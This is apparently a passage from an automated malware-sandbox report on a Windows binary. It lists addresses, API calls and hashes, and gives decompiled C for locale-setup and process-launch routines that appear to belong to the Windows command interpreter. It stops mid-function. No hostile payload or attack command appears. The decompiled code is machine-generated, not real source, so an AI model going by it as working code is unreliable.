                                              0x00000000
                                              0x00000000
                                              0x002be22f
                                              0x002be22f
                                              0x002be232
                                              0x002be234
                                              0x00000000
                                              0x002be234
                                              0x002be22d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be22d
                                              0x002b3fb6
                                              0x002b3fcd
                                              0x002b4011
                                              0x002b401c
                                              0x002b4032
                                              0x002b403b
                                              0x002b403e
                                              0x002be23c
                                              0x002be23f
                                              0x002be263
                                              0x002be26d
                                              0x002be241
                                              0x002be244
                                              0x002be24a
                                              0x002be254
                                              0x002be254
                                              0x002be244
                                              0x002b4044
                                              0x002b4044
                                              0x002b4049
                                              0x002b4049
                                              0x002b403e
                                              0x002b405e
                                              0x002b4074
                                              0x002b4080
                                              0x002b4080
                                              0x002b409c
                                              0x002be27c
                                              0x002be286
                                              0x002be28b
                                              0x002be28d
                                              0x002be28d
                                              0x002be295
                                              0x00000000
                                              0x00000000
                                              0x002be297
                                              0x002be29e
                                              0x00000000
                                              0x00000000
                                              0x002be2a0
                                              0x002be2a3
                                              0x002be2a6
                                              0x002be2a9
                                              0x00000000
                                              0x00000000
                                              0x002be2b1
                                              0x002be2b1
                                              0x002be2b4
                                              0x002be2b6
                                              0x00000000
                                              0x002be2b6
                                              0x002be2af
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b40a2
                                              0x002b40a2
                                              0x002b40b4
                                              0x002be2be
                                              0x002be2c8
                                              0x002be2cd
                                              0x002be2cf
                                              0x002be2cf
                                              0x002be2d7
                                              0x00000000
                                              0x00000000
                                              0x002be2d9
                                              0x002be2e0
                                              0x00000000
                                              0x00000000
                                              0x002be2e2
                                              0x002be2e5
                                              0x002be2e8
                                              0x002be2eb
                                              0x00000000
                                              0x00000000
                                              0x002be2f3
                                              0x002be2f3
                                              0x002be2f6
                                              0x002be2f8
                                              0x00000000
                                              0x002be2f8
                                              0x002be2f1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be2f1
                                              0x002b40ba
                                              0x002b40cc
                                              0x002be300
                                              0x002be30a
                                              0x002be30f
                                              0x002be311
                                              0x002be311
                                              0x002be319
                                              0x00000000
                                              0x00000000
                                              0x002be31b
                                              0x002be322
                                              0x00000000
                                              0x00000000
                                              0x002be324
                                              0x002be327
                                              0x002be32a
                                              0x002be32d
                                              0x00000000
                                              0x00000000
                                              0x002be335
                                              0x002be335
                                              0x002be338
                                              0x002be33a
                                              0x00000000
                                              0x002be33a
                                              0x002be333
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be333
                                              0x002b40d2
                                              0x002b40e4
                                              0x002be342
                                              0x002be34c
                                              0x002be351
                                              0x002be353
                                              0x002be353
                                              0x002be35b
                                              0x00000000
                                              0x00000000
                                              0x002be35d
                                              0x002be364
                                              0x00000000
                                              0x00000000
                                              0x002be366
                                              0x002be369
                                              0x002be36c
                                              0x002be36f
                                              0x00000000
                                              0x00000000
                                              0x002be377
                                              0x002be377
                                              0x002be37a
                                              0x002be37c
                                              0x00000000
                                              0x002be37c
                                              0x002be375
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be375
                                              0x002b40ea
                                              0x002b40fc
                                              0x002be384
                                              0x002be38e
                                              0x002be393
                                              0x002be395
                                              0x002be395
                                              0x002be39d
                                              0x00000000
                                              0x00000000
                                              0x002be39f
                                              0x002be3a6
                                              0x00000000
                                              0x00000000
                                              0x002be3a8
                                              0x002be3ab
                                              0x002be3ae
                                              0x002be3b1
                                              0x00000000
                                              0x00000000
                                              0x002be3b9
                                              0x002be3b9
                                              0x002be3bc
                                              0x002be3be
                                              0x00000000
                                              0x002be3be
                                              0x002be3b7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be3b7
                                              0x002b4102
                                              0x002b4114
                                              0x002be3c6
                                              0x002be3d0
                                              0x002be3d5
                                              0x002be3d7
                                              0x002be3d7
                                              0x002be3df
                                              0x00000000
                                              0x00000000
                                              0x002be3e1
                                              0x002be3e8
                                              0x00000000
                                              0x00000000
                                              0x002be3ea
                                              0x002be3ed
                                              0x002be3f0
                                              0x002be3f3
                                              0x00000000
                                              0x00000000
                                              0x002be3fb
                                              0x002be3fb
                                              0x002be3fe
                                              0x002be400
                                              0x00000000
                                              0x002be400
                                              0x002be3f9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be3f9
                                              0x002b411a
                                              0x002b412c
                                              0x002be408
                                              0x002be412
                                              0x002be417
                                              0x002be419
                                              0x002be419
                                              0x002be421
                                              0x00000000
                                              0x00000000
                                              0x002be423
                                              0x002be42a
                                              0x00000000
                                              0x00000000
                                              0x002be42c
                                              0x002be42f
                                              0x002be432
                                              0x002be435
                                              0x00000000
                                              0x00000000
                                              0x002be43d
                                              0x002be43d
                                              0x002be440
                                              0x002be442
                                              0x00000000
                                              0x002be442
                                              0x002be43b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be43b
                                              0x002b4132
                                              0x002b4144
                                              0x002be44a
                                              0x002be454
                                              0x002be459
                                              0x002be45b
                                              0x002be45b
                                              0x002be463
                                              0x00000000
                                              0x00000000
                                              0x002be465
                                              0x002be46c
                                              0x00000000
                                              0x00000000
                                              0x002be46e
                                              0x002be471
                                              0x002be474
                                              0x002be477
                                              0x00000000
                                              0x00000000
                                              0x002be47f
                                              0x002be47f
                                              0x002be482
                                              0x002be484
                                              0x00000000
                                              0x002be484
                                              0x002be47d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be47d
                                              0x002b414a
                                              0x002b415c
                                              0x002be48c
                                              0x002be496
                                              0x002be49b
                                              0x002be49d
                                              0x002be49d
                                              0x002be4a5
                                              0x00000000
                                              0x00000000
                                              0x002be4a7
                                              0x002be4ae
                                              0x00000000
                                              0x00000000
                                              0x002be4b0
                                              0x002be4b3
                                              0x002be4b6
                                              0x002be4b9
                                              0x00000000
                                              0x00000000
                                              0x002be4c1
                                              0x002be4c1
                                              0x002be4c4
                                              0x002be4c6
                                              0x00000000
                                              0x002be4c6
                                              0x002be4bf
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be4bf
                                              0x002b4162
                                              0x002b4174
                                              0x002be4ce
                                              0x002be4d8
                                              0x002be4dd
                                              0x002be4df
                                              0x002be4df
                                              0x002be4e7
                                              0x00000000
                                              0x00000000
                                              0x002be4e9
                                              0x002be4f0
                                              0x00000000
                                              0x00000000
                                              0x002be4f2
                                              0x002be4f5
                                              0x002be4f8
                                              0x002be4fb
                                              0x00000000
                                              0x00000000
                                              0x002be503
                                              0x002be503
                                              0x002be506
                                              0x002be508
                                              0x00000000
                                              0x002be508
                                              0x002be501
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be501
                                              0x002b417a
                                              0x002b4181
                                              0x002b4199
                                              0x002b4199
                                              0x002b3fcf
                                              0x002b3fcf
                                              0x002b3fd4
                                              0x002b3fe0
                                              0x002b3fe0
                                              0x002b3fe6
                                              0x00000000
                                              0x00000000
                                              0x002b3fef
                                              0x002b400a
                                              0x002b400a
                                              0x002b400c
                                              0x002b400c
                                              0x00000000
                                              0x002b400c
                                              0x002b3ff1
                                              0x002b3ff5
                                              0x002b3ff9
                                              0x00000000
                                              0x00000000
                                              0x002b3fff
                                              0x002b4002
                                              0x002b4008
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b4008
                                              0x002b419a
                                              0x002b419c
                                              0x00000000
                                              0x002b419c

                                              APIs
                                                • Part of subcall function 002B41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(002A5BA1,0000001F,?,00000080), ref: 002B41A4
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,002CF81C,00000008,00000000,?), ref: 002B3FA8
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 002B3FC5
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 002B402A
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 002B406C
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,002CF80C,00000008), ref: 002B4094
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,002CF7A8,00000020), ref: 002B40AC
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,002CF768,00000020), ref: 002B40C4
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,002CF728,00000020), ref: 002B40DC
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,002CF6E8,00000020), ref: 002B40F4
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,002CF6A8,00000020), ref: 002B410C
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,002CF668,00000020), ref: 002B4124
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,002CF628,00000020), ref: 002B413C
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,002CF7FC,00000008), ref: 002B4154
                                              • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,002CF7E8,00000008), ref: 002B416C
                                              • setlocale.MSVCRT ref: 002B4181
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: InfoLocale$DefaultUsersetlocale
                                              • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                              • API String ID: 1351325837-478706884
                                              • Opcode ID: c915529bb1eb14492157f845c906e48510eb159be4c318292caa14888d649353
                                              • Instruction ID: 88837c3375aae6267350e4585840621bb9c43e1cc337a06a729179ee534ac632
                                              • Opcode Fuzzy Hash: c915529bb1eb14492157f845c906e48510eb159be4c318292caa14888d649353
                                              • Instruction Fuzzy Hash: 6ED1057067020396DF249F348D49BF632AAFF517C0F15826EEA169B6D4EBB0CA25C351
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B374E, Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 322threadprocessstringCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E002B374E(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				void* _t74;
				intOrPtr _t84;
				intOrPtr _t90;
				WCHAR* _t92;
				WCHAR* _t94;
				WCHAR* _t95;
				int _t98;
				long _t99;
				signed int _t101;
				void* _t104;
				struct _SECURITY_ATTRIBUTES* _t109;
				void* _t117;
				WCHAR* _t122;
				WCHAR* _t129;
				WCHAR* _t135;
				void* _t147;
				signed int _t154;
				WCHAR* _t163;
				void* _t165;
				signed int _t167;
				void* _t169;
				WCHAR* _t174;
				struct _SECURITY_ATTRIBUTES* _t177;
				void* _t178;

				E002B75CC(__ebx, __edi, __esi);
				 *(_t178 - 0xa8) = __edx;
				 *((intOrPtr*)(_t178 - 0xbc)) = __ecx;
				_t174 =  *(_t178 + 0xc);
				_t135 =  *(_t178 + 0x10);
				_t177 = 0;
				 *(_t178 - 0xac) = 0;
				 *(_t178 - 0xa4) = 0;
				 *((intOrPtr*)(_t178 - 0xb0)) = 0;
				 *((intOrPtr*)(_t178 - 0xb4)) = 0x20;
				_t68 = _t178 - 0xa0;
				__imp__InitializeProcThreadAttributeList(_t68, 1, 0, _t178 - 0xb4, 0x2cbdf8, 0x108);
				if(_t68 == 0) {
					 *0x2e3cf0 = GetLastError();
					E002C5011(_t135);
					L21:
					return E002B7614(_t135, _t174, _t177);
				}
				 *((intOrPtr*)(_t178 - 0xb8)) = 1;
				_t74 = _t178 - 0xa0;
				__imp__UpdateProcThreadAttribute(_t74, 0, 0x60001, _t178 - 0xb8, 4, 0, 0);
				if(_t74 == 0) {
					 *0x2e3cf0 = GetLastError();
					E002C5011(_t135);
					__imp__DeleteProcThreadAttributeList(_t178 - 0xa0);
					goto L36;
				} else {
					memset(_t178 - 0x118, 0, 0x48);
					 *((intOrPtr*)(_t178 - 0xd4)) = _t178 - 0xa0;
					 *(_t178 - 0x118) = 0x48;
					 *((intOrPtr*)(_t178 - 0x10c)) =  *((intOrPtr*)(_t178 + 0x14));
					 *((intOrPtr*)(_t178 - 0x108)) = 0;
					 *((intOrPtr*)(_t178 - 0x104)) = 1;
					_t84 = 0x64;
					 *((intOrPtr*)(_t178 - 0x100)) = _t84;
					 *((intOrPtr*)(_t178 - 0xfc)) = _t84;
					 *((intOrPtr*)(_t178 - 0xec)) = 0;
					 *(_t178 - 0xe8) = 1;
					memset(_t178 - 0x68, 0, 0x44);
					 *(_t178 - 0x68) = 0x44;
					GetStartupInfoW(_t178 - 0x68);
					 *((intOrPtr*)(_t178 - 0x110)) =  *((intOrPtr*)(_t178 - 0x60));
					 *((intOrPtr*)(_t178 - 4)) = 0;
					if(E002B3320(L"COPYCMD") == 0) {
					}
					_t90 = E002ADF40(0x2a24ac);
					 *((intOrPtr*)(_t178 - 0xb0)) = _t90;
					if(_t90 == 0) {
						L35:
						_push(0xfffffffe);
						_push(_t178 - 0x10);
						_push(0x2cd0b4);
						L002B82BB();
						L36:
						goto L21;
					}
					if( *0x2e3ccc == 0) {
						__eflags =  *0x2e8058;
						if( *0x2e8058 != 0) {
							goto L6;
						}
						__eflags =  *0x2e3cc4;
						if( *0x2e3cc4 == 0) {
							L8:
							E002B4C00();
							_t94 =  *0x2e3cc4;
							if(_t94 != 0) {
								_t147 = _t94[0x18];
								__eflags = _t147;
								if(_t147 == 0) {
									goto L9;
								}
								_t129 =  *0x2e3cb8;
								__eflags = _t129;
								if(_t129 == 0) {
									_t129 = 0x2e3ab0;
								}
								_t98 = CreateProcessAsUserW(_t147, _t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t129, _t178 - 0x118, _t178 - 0xcc);
								L11:
								_t174 = _t98;
								if(_t174 == 0) {
									_t99 = GetLastError();
									 *(_t178 - 0xac) = _t99;
									 *0x2e3cf0 = _t99;
								} else {
									 *(_t178 - 0xa4) =  *(_t178 - 0xcc);
									CloseHandle( *(_t178 - 0xc8));
								}
								_t150 = L"COPYCMD";
								E002B3A50(L"COPYCMD",  *((intOrPtr*)(_t178 - 0xb0)));
								if(_t174 == 0) {
									__eflags =  *0x2e3cc9;
									if( *0x2e3cc9 == 0) {
										L48:
										__eflags =  *0x2e3cf0 - 0x2e4;
										if( *0x2e3cf0 != 0x2e4) {
											L54:
											__eflags = _t174;
											if(_t174 != 0) {
												goto L14;
											}
											_t177 = E002B00B0(0xffce);
											__eflags = _t177;
											if(_t177 != 0) {
												E002B1040(_t177, 0x7fe7, _t135);
												E002C5011(_t177);
												E002B0040(_t177);
											}
											goto L35;
										}
										L49:
										_t122 = E002B7797(_t150);
										__eflags = _t122;
										if(_t122 == 0) {
											_t174 = _t177;
										} else {
											_t163 =  *0x2e3cb8;
											__eflags = _t163;
											if(_t163 == 0) {
												_t163 = 0x2e3ab0;
											}
											_t174 =  *0x2ec01c(_t177, _t135,  *((intOrPtr*)( *((intOrPtr*)(_t178 - 0xbc)) + 0x3c)), _t163,  *(_t178 - 0xe8) & 0x0000ffff, _t178 - 0xa4, 0x2e3cf0);
										}
										goto L54;
									}
									__eflags =  *0x2e3cf0 - 0xc1;
									if( *0x2e3cf0 == 0xc1) {
										goto L49;
									}
									goto L48;
								} else {
									L14:
									_t101 =  *(_t178 - 0xa4);
									_t174 = _t101 & 1;
									_t167 = 2;
									_t154 = _t101 & _t167;
									if(_t101 == 0) {
										L62:
										_t135 = 4;
										L16:
										 *(_t178 - 0xac) = _t177;
										 *0x2d3838 = 1;
										if(_t135 != 0) {
											L26:
											__eflags = _t135 - 4;
											if(_t135 == 4) {
												_t104 =  *(_t178 - 0xa4);
												__eflags = _t104;
												if(_t104 != 0) {
													CloseHandle(_t104);
													 *(_t178 - 0xa4) = _t177;
												}
											} else {
												__eflags = _t135 - _t167;
												if(_t135 == _t167) {
													 *0x2cd54c =  *(_t178 - 0xa4);
												}
											}
											L20:
											 *((intOrPtr*)(_t178 - 4)) = 0xfffffffe;
											E002B3A30();
											goto L21;
										}
										_t109 = E002B4C3E();
										 *0x2db8b0 = _t109;
										 *(_t178 - 0xa4) = _t177;
										_t177 = _t109;
										 *(_t178 - 0xac) = _t177;
										E002B274C(_t178 - 0x4c, 0x14, L"%08X", _t177);
										E002B3A50(L"=ExitCode", _t178 - 0x4c);
										if(_t177 >= 0x20) {
											__eflags = _t177 - 0x7e;
											if(_t177 > 0x7e) {
												goto L18;
											}
											E002B274C(_t178 - 0x80, 0xc, L"%01C", _t177);
											_t169 = _t178 - 0x80;
											L19:
											E002B3A50(L"=ExitCodeAscii", _t169);
											if(_t174 != 0) {
												E002C579A(L"=ExitCodeAscii", __eflags);
											}
											goto L20;
										}
										L18:
										_t169 = 0x2a24f0;
										goto L19;
									}
									_t135 =  *(_t178 - 0xa8);
									if( *0x2e3ccc == 0) {
										__eflags =  *0x2e3cc4;
										if( *0x2e3cc4 != 0) {
											goto L16;
										}
										__eflags =  *0x2e3cc9;
										if( *0x2e3cc9 == 0) {
											goto L16;
										} else {
											__eflags =  *0x2e8058;
											if( *0x2e8058 != 0) {
												goto L16;
											}
											__eflags = _t135;
											if(_t135 != 0) {
												goto L16;
											}
											__eflags = _t154;
											if(_t154 != 0) {
												goto L62;
											}
											_t117 = E002C52E3(_t101, _t167);
											_t167 = 2;
											__eflags = _t167 - _t117;
											if(_t167 != _t117) {
												goto L16;
											}
											goto L62;
										}
										goto L26;
									}
									goto L16;
								}
							}
							L9:
							_t95 =  *0x2e3cb8;
							if(_t95 == 0) {
								_t95 = 0x2e3ab0;
							}
							_t98 = CreateProcessW(_t135, _t174, _t177, _t177, 1, 0x80000, _t177, _t95, _t178 - 0x118, _t178 - 0xcc);
							goto L11;
						}
					}
					L6:
					_t165 = 0x5c;
					_t92 = E002B2349(_t135, _t165);
					if(_t92 != 0 && lstrcmpW(_t92, L"\\XCOPY.EXE") == 0) {
						E002C4478();
					}
					goto L8;
				}
			}




























                                              0x002b3758
                                              0x002b375d
                                              0x002b3763
                                              0x002b3769
                                              0x002b376c
                                              0x002b376f
                                              0x002b3771
                                              0x002b3777
                                              0x002b377d
                                              0x002b3783
                                              0x002b3799
                                              0x002b37a0
                                              0x002b37a8
                                              0x002bddec
                                              0x002bddf3
                                              0x002b39e2
                                              0x002b39e7
                                              0x002b39e7
                                              0x002b37b1
                                              0x002b37c8
                                              0x002b37cf
                                              0x002b37d7
                                              0x002bde08
                                              0x002bde0f
                                              0x002bde1b
                                              0x00000000
                                              0x002b37dd
                                              0x002b37e7
                                              0x002b37f5
                                              0x002b37fb
                                              0x002b3808
                                              0x002b380e
                                              0x002b3817
                                              0x002b381f
                                              0x002b3820
                                              0x002b3826
                                              0x002b382c
                                              0x002b3832
                                              0x002b3840
                                              0x002b3848
                                              0x002b3853
                                              0x002b385c
                                              0x002b3862
                                              0x002b3871
                                              0x002b3873
                                              0x002b387a
                                              0x002b387f
                                              0x002b3887
                                              0x002bde3e
                                              0x002bde3e
                                              0x002bde43
                                              0x002bde44
                                              0x002bde49
                                              0x002bde51
                                              0x00000000
                                              0x002bde53
                                              0x002b3894
                                              0x002bde59
                                              0x002bde60
                                              0x00000000
                                              0x00000000
                                              0x002bde66
                                              0x002bde6d
                                              0x002b38bc
                                              0x002b38bc
                                              0x002b38c1
                                              0x002b38c8
                                              0x002b39ea
                                              0x002b39ed
                                              0x002b39ef
                                              0x00000000
                                              0x00000000
                                              0x002bde82
                                              0x002bde87
                                              0x002bde89
                                              0x002bde8b
                                              0x002bde8b
                                              0x002bdeae
                                              0x002b38fe
                                              0x002b38fe
                                              0x002b3902
                                              0x002bdec3
                                              0x002bdec9
                                              0x002bdecf
                                              0x002b3908
                                              0x002b390e
                                              0x002b391a
                                              0x002b391a
                                              0x002b3926
                                              0x002b392b
                                              0x002b3932
                                              0x002bded9
                                              0x002bdee0
                                              0x002bdeee
                                              0x002bdeee
                                              0x002bdef8
                                              0x002bdf3e
                                              0x002bdf3e
                                              0x002bdf40
                                              0x00000000
                                              0x00000000
                                              0x002bdf50
                                              0x002bdf52
                                              0x002bdf54
                                              0x002bde2b
                                              0x002bde32
                                              0x002bde39
                                              0x002bde39
                                              0x00000000
                                              0x002bdf54
                                              0x002bdefa
                                              0x002bdefa
                                              0x002bdeff
                                              0x002bdf01
                                              0x002bdf3c
                                              0x002bdf03
                                              0x002bdf03
                                              0x002bdf09
                                              0x002bdf0b
                                              0x002bdf0d
                                              0x002bdf0d
                                              0x002bdf38
                                              0x002bdf38
                                              0x00000000
                                              0x002bdf01
                                              0x002bdee2
                                              0x002bdeec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b3938
                                              0x002b3938
                                              0x002b3938
                                              0x002b3943
                                              0x002b3949
                                              0x002b394a
                                              0x002b394e
                                              0x002bdf98
                                              0x002bdf9a
                                              0x002b3967
                                              0x002b3967
                                              0x002b3970
                                              0x002b3977
                                              0x002b3a0c
                                              0x002b3a0c
                                              0x002b3a0f
                                              0x002bdfbc
                                              0x002bdfc2
                                              0x002bdfc4
                                              0x002bdfcb
                                              0x002bdfd1
                                              0x002bdfd1
                                              0x002b3a15
                                              0x002b3a15
                                              0x002b3a17
                                              0x002b3a1f
                                              0x002b3a1f
                                              0x002b3a17
                                              0x002b39d4
                                              0x002b39d4
                                              0x002b39db
                                              0x00000000
                                              0x002b39e0
                                              0x002b3983
                                              0x002b3988
                                              0x002b398d
                                              0x002b3993
                                              0x002b3995
                                              0x002b39a7
                                              0x002b39b7
                                              0x002b39bf
                                              0x002b3a26
                                              0x002b3a29
                                              0x00000000
                                              0x00000000
                                              0x002bdfac
                                              0x002bdfb4
                                              0x002b39c6
                                              0x002b39cb
                                              0x002b39d2
                                              0x002b3a49
                                              0x002b3a49
                                              0x00000000
                                              0x002b39d2
                                              0x002b39c1
                                              0x002b39c1
                                              0x00000000
                                              0x002b39c1
                                              0x002b3954
                                              0x002b3961
                                              0x002b39fa
                                              0x002b3a01
                                              0x00000000
                                              0x00000000
                                              0x002bdf5f
                                              0x002bdf66
                                              0x00000000
                                              0x002bdf6c
                                              0x002bdf6c
                                              0x002bdf73
                                              0x00000000
                                              0x00000000
                                              0x002bdf79
                                              0x002bdf7b
                                              0x00000000
                                              0x00000000
                                              0x002bdf81
                                              0x002bdf83
                                              0x00000000
                                              0x00000000
                                              0x002bdf87
                                              0x002bdf8e
                                              0x002bdf8f
                                              0x002bdf92
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bdf92
                                              0x00000000
                                              0x002bdf66
                                              0x00000000
                                              0x002b3961
                                              0x002b3932
                                              0x002b38ce
                                              0x002b38ce
                                              0x002b38d5
                                              0x002bdeb9
                                              0x002bdeb9
                                              0x002b38f8
                                              0x00000000
                                              0x002b38f8
                                              0x002bde73
                                              0x002b389a
                                              0x002b389c
                                              0x002b389f
                                              0x002b38a6
                                              0x002bde78
                                              0x002bde78
                                              0x00000000
                                              0x002b38a6

                                              APIs
                                              • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,002CBDF8,00000108,002AC897,?,00000000,00000000,00000000), ref: 002B37A0
                                              • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 002B37CF
                                              • memset.MSVCRT ref: 002B37E7
                                              • memset.MSVCRT ref: 002B3840
                                              • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 002B3853
                                                • Part of subcall function 002B3320: _wcsnicmp.MSVCRT ref: 002B33A4
                                              • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 002B38AE
                                              • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 002B38F8
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002B391A
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 002BDDE6
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 002BDE02
                                              • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 002BDE1B
                                              • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 002BDEAE
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 002BDFCB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                              • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                              • API String ID: 1603632292-3461277227
                                              • Opcode ID: be00ee3fa386038808928d2c67796a4660f33dbdf0f8a7a9bccc9407d5ee4f01
                                              • Instruction ID: 0e159f50da238981f72f236523f9670ebfe3017fa3ce7173ce7d970f18b4b93a
                                              • Opcode Fuzzy Hash: be00ee3fa386038808928d2c67796a4660f33dbdf0f8a7a9bccc9407d5ee4f01
                                              • Instruction Fuzzy Hash: 6DC1A570A603559BDB24DF64DC89BEA77B8AB45380F1040AAE549EB250EBB0CE94CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E002B6550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E002B8290(0x44d4);
				_t187 =  *0x2cd0b4; // 0x40f69e4c
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E002B65F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
